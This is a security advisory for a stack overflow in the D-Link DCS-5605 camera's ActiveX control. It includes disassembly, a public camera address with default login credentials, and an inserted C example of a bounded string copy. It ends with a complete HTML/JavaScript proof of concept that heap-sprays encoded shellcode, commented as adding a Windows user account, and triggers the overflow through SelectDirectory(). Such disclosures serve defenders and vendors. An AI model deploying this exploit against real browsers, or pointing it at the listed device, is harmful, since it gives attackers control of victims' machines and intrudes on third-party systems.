D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control
DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description:
"The DCS-5605 is a high performance camera for professional surveillance
and remote monitoring. This network camera features motorized pan,
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
zoom lens delivers the level of detail necessary to identify faces, license
plate numbers, and other important details that are difficult to
clearly distinguish using digital zoom alone"

background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

Vulnerability:
The ActiveX control exposes the SelectDirectory()
method, which takes one optional argument.
See typelib:

...
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
    /* VT_VARIANT [12] [in] */ $varDefPath
)
{
    /* method SelectDirectory */
}
...

This method suffers from a stack-based buffer overflow
because of an unsafe lstrcpyW() call inside DcsCliCtrl.dll:

...
100712E0  81EC 34040000      sub esp,434
100712E6  A1 2C841010        mov eax,dword ptr ds:[1010842C]
100712EB  33C4               xor eax,esp
100712ED  898424 30040000    mov dword ptr ss:[esp+430],eax
100712F4  53                 push ebx
100712F5  8B9C24 48040000    mov ebx,dword ptr ss:[esp+448]
100712FC  55                 push ebp
100712FD  8BAC24 40040000    mov ebp,dword ptr ss:[esp+440]
10071304  56                 push esi
10071305  8BB424 4C040000    mov esi,dword ptr ss:[esp+44C]
1007130C  57                 push edi
1007130D  8BBC24 4C040000    mov edi,dword ptr ss:[esp+44C]
10071314  68 08020000        push 208
10071319  8D4424 34          lea eax,dword ptr ss:[esp+34]
1007131D  6A 00              push 0
1007131F  50                 push eax
10071320  E8 0BC40300        call DcsCliCt.100AD730
10071325  83C4 0C            add esp,0C
10071328  85F6               test esi,esi
1007132A  74 0C              je short DcsCliCt.10071338
1007132C  56                 push esi
1007132D  8D4C24 34          lea ecx,dword ptr ss:[esp+34]
10071331  51                 push ecx
10071332  FF15 D4D20C10      call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <-------------
...

The destination (esp+34) is a local buffer that the preceding call initializes
with a length of 0x208 bytes (push 208), but lstrcpyW then copies the string in
esi, taken from the method's argument, up to its terminator with no length check,
so anything longer than the buffer runs past it into the rest of the stack frame.

An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to
the mentioned method and overwriting critical structures (SEH).

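The root cause is the unbounded copy into a fixed 0x208-byte stack buffer. As an added example that is not part of the advisory or of the vendor's code, here is the bounded replacement in portable C, with the same contract as StringCchCopyW on Windows; the function names, PATH_BUF_CHARS and the status codes are assumptions for illustration.

```c
#include <stddef.h>
#include <wchar.h>

/* 0x208 bytes reserved in the listing = 260 16-bit WCHARs (MAX_PATH).
 * wchar_t is used so this compiles off Windows; the count is what matters. */
#define PATH_BUF_CHARS 260

enum copy_status { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_BAD_ARG = 2 };

/* Bounded replacement for the lstrcpyW() call: never writes past dst_chars,
 * always NUL-terminates, and reports an over-long source instead of
 * overflowing (the behaviour StringCchCopyW gives on Windows). */
static enum copy_status copy_path_bounded(wchar_t *dst, size_t dst_chars,
                                          const wchar_t *src)
{
    size_t n = 0;
    if (dst == NULL || src == NULL || dst_chars == 0)
        return COPY_BAD_ARG;
    /* Scan at most dst_chars characters; lstrcpyW scans to the NUL, however far. */
    while (n < dst_chars && src[n] != L'\0')
        n++;
    if (n == dst_chars) {            /* no room left for the terminator: reject */
        dst[0] = L'\0';
        return COPY_TOO_LONG;
    }
    wmemcpy(dst, src, n + 1);        /* n chars + NUL, fits by construction */
    return COPY_OK;
}

/* Hardened shape of SelectDirectory(varDefPath): the optional default path is
 * validated before it reaches the fixed-size stack buffer. */
static enum copy_status select_directory_default(const wchar_t *def_path,
                                                 wchar_t out[PATH_BUF_CHARS])
{
    if (def_path == NULL) {          /* argument omitted: empty default path */
        out[0] = L'\0';
        return COPY_OK;
    }
    return copy_path_bounded(out, PATH_BUF_CHARS, def_path);
}

/* Helper for constructed test input: count copies of ch plus a terminator
 * (buf must hold count + 1 characters). */
static void fill_wide(wchar_t *buf, size_t count, wchar_t ch)
{
    wmemset(buf, ch, count);
    buf[count] = L'\0';
}
```

A 259-character path is accepted; 260 or more (the advisory's PoC passes 1800 wide characters) is refused with COPY_TOO_LONG and the buffer left empty.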
Proof of concept code is attached.

Note: to reproduce the intended crash,
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you get an unusable crash; however, it could be
possible, by modifying the PoC, to have EIP overwritten as well.

I think that it is also possible that other products might carry this dll;
I could post an update if I find more.

Additional note:

0:029> lm -vm DcsCliCtrl
start    end        module name
08450000 0859e000   DcsCliCtrl   (deferred)
    Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
    Image name: DcsCliCtrl.dll
    Timestamp:        Thu Aug 19 08:48:47 2010 (4C6CD3CF)
    CheckSum:         001325EC
    ImageSize:        0014E000
    File version:     1.0.0.4519
    Product version:  1.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04e4
    ProductName:      Camera Streaming Client
    InternalName:     DcsCliCtrl.dll
    OriginalFilename: DcsCliCtrl.dll
    ProductVersion:   1.0.0.1
    FileVersion:      1.0.0.4519
    FileDescription:  Camera Stream Client Control
    LegalCopyright:   Copyright: (c) All rights reserved.

<!--
D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
lstrcpyW Remote Buffer Overflow Vulnerability poc
(ie7)

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
please select a directory to download ...
<object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0>
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x = "";
for (i=0; i<200; i++){
  x = x + unescape("%u4141%u4141");
}
for (i=0; i<700; i++){
  x = x + unescape("%u0c0c%u0c0c");
}
obj.SelectDirectory(x);
</script>
</html>